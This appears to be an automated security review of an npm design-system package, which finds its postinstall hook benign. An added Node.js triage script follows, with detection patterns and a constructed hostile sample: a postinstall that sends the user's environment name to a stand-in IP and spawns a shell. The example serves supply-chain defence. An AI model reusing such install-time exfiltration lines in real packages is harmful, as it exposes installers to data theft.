AI Security Review
scanned 5d ago · by lpm-firewall-ai

No confirmed malicious attack surface was found. Install-time behavior is limited to a guarded welcome banner and version sentinel; optional agent skill installation is an explicit user action.
Decision evidence
public snapshot
- package.json defines postinstall: node scripts/welcome.mjs || true
- scripts/welcome.mjs writes a benign sentinel node_modules/.shilp-sutra-welcomed during eligible TTY installs
- skill/install.sh can overwrite an agent skill directory, but only when a user explicitly runs the installer
- scripts/welcome.mjs only reads package.json/env/TTY state, prints setup text, and records the current version sentinel
- postinstall has no network calls, child_process use, credential access, shell execution, or agent config writes
- AGENTS.md and skill/SKILL.md are package-aligned design-system usage instructions, not hidden lifecycle mutation
- skill/install.sh network access targets the package's GitHub repo and is documented/user-invoked, not run by npm install
- dist/ui/index.js is a React component barrel with a browser-only CSS-token warning and no exfiltration behavior
- bundled woff2 fonts are expected design-system assets
Source & flagged code
5 flagged
- Package defines install-time lifecycle scripts. (package.json)
- Install-time lifecycle script is not statically allowlisted and needs review. (package.json)
- Install-time source drops package-supplied AI-agent/MCP control files or instructions. (scripts/welcome.mjs, line 4)
- Package ships non-JavaScript build or shell helper files. (skill/install.sh)
- Package ships high-entropy non-source blobs. (fonts/Inter-Italic-Variable.woff2)
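Both the decision evidence above and the flagged findings rest on a static reading of package.json and of the file its postinstall hook runs: which lifecycle hooks exist, which script files they invoke, and whether those files touch the network, spawn processes, read the environment or write files. The following Node script is an added example of that triage (it is not the reviewed package's code nor lpm-firewall-ai's scanner): it lists the hooks, resolves their JavaScript entry points and scans them for capability signatures. The package names, file contents, capability names and the block/review policy are all constructed for illustration; the benign sample mirrors the welcome-banner behaviour described in the evidence list, the hostile sample is a deliberate contrast.

```javascript
// Added example, not the reviewed package's code: static triage of an unpacked
// npm package. It lists lifecycle hooks from package.json, resolves the JavaScript
// files they run, and scans those files for capabilities a banner should not need.
'use strict';

const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Capability signatures. The names and regexes are this example's own policy;
// they are a triage aid, not proof (string-built requires or eval evade them).
const RISKY_PATTERNS = {
  network:       /\b(?:node:)?(?:https?|net|dns|tls)\b|\bfetch\s*\(/,
  child_process: /\b(?:node:)?child_process\b|\b(?:execSync|spawnSync|execFileSync)\s*\(/,
  env_read:      /\bprocess\.env\b/,
  fs_write:      /\b(?:writeFileSync|writeFile|appendFileSync|mkdirSync|renameSync|rmSync)\s*\(/,
  agent_config:  /AGENTS\.md|SKILL\.md|mcp\.json/i,
};

// Lifecycle scripts declared in package.json, in hook order.
function lifecycleScripts(pkg) {
  const scripts = (pkg && pkg.scripts) || {};
  const out = {};
  for (const hook of LIFECYCLE_HOOKS) {
    if (typeof scripts[hook] === 'string') out[hook] = scripts[hook];
  }
  return out;
}

// JavaScript files named in a hook command such as "node scripts/welcome.mjs || true".
function scriptEntrypoints(command) {
  return command
    .split(/\s*(?:&&|\|\||;)\s*/)
    .flatMap((part) => part.split(/\s+/))
    .filter((tok) => /\.(?:[cm]?js)$/.test(tok))
    .map((tok) => tok.replace(/^\.\//, ''));
}

// Capability names whose signature appears in the source, sorted for stable output.
function scanSource(src) {
  return Object.entries(RISKY_PATTERNS)
    .filter(([, re]) => re.test(src))
    .map(([name]) => name)
    .sort();
}

// files: { relativePath: contents } for the unpacked tarball (in-memory here).
function triage(files) {
  const pkg = JSON.parse(files['package.json']);
  return Object.entries(lifecycleScripts(pkg)).map(([hook, command]) => {
    const entrypoints = scriptEntrypoints(command);
    const findings = {};
    for (const ep of entrypoints) {
      findings[ep] = ep in files ? scanSource(files[ep]) : ['missing_file'];
    }
    return { hook, command, entrypoints, findings };
  });
}

// Policy (this example's own): no hooks is ok; network or process spawning at
// install time blocks; any other lifecycle hook still needs a human look.
function verdict(results) {
  if (results.length === 0) return 'ok';
  const all = results.flatMap((r) => Object.values(r.findings).flat());
  if (all.some((f) => f === 'network' || f === 'child_process')) return 'block';
  return 'review';
}

// Constructed sample mirroring the welcome-banner behaviour described on this page.
const BENIGN_PACKAGE = {
  'package.json': JSON.stringify({
    name: 'example-design-system', version: '1.2.3',
    scripts: { postinstall: 'node scripts/welcome.mjs || true' },
  }),
  'scripts/welcome.mjs': `
import { readFileSync, writeFileSync, existsSync } from 'node:fs';
const pkg = JSON.parse(readFileSync(new URL('../package.json', import.meta.url), 'utf8'));
const sentinel = 'node_modules/.example-welcomed';
if (process.stdout.isTTY && !process.env.CI && !existsSync(sentinel)) {
  console.log('Thanks for installing ' + pkg.name + '@' + pkg.version);
  writeFileSync(sentinel, pkg.version);
}
`,
};

// Constructed contrast: a postinstall that phones home and spawns a shell.
const HOSTILE_PACKAGE = {
  'package.json': JSON.stringify({
    name: 'example-bad', version: '0.0.1',
    scripts: { postinstall: 'node setup.js' },
  }),
  'setup.js': `
const { execSync } = require('child_process');
const https = require('https');
https.get('https://203.0.113.1/ping?u=' + encodeURIComponent(process.env.USER || ''));
execSync('sh ./setup.sh');
`,
};

for (const files of [BENIGN_PACKAGE, HOSTILE_PACKAGE]) {
  const results = triage(files);
  console.log(JSON.parse(files['package.json']).name, verdict(results), JSON.stringify(results));
}
```

On a real package, populate the files map from `npm pack <name>` followed by `tar -xzf`, or inspect the tree after `npm install --ignore-scripts`, so nothing runs before the triage. The benign sample comes out as env_read plus fs_write only, which is exactly the evidence profile above (reads env and TTY state, writes a sentinel, no network or child_process); the hostile sample trips network and child_process and is blocked. Files that are not JavaScript, such as skill/install.sh, are outside this pass and need a separate read, which is why the page lists them as flags even when they are only user-invoked.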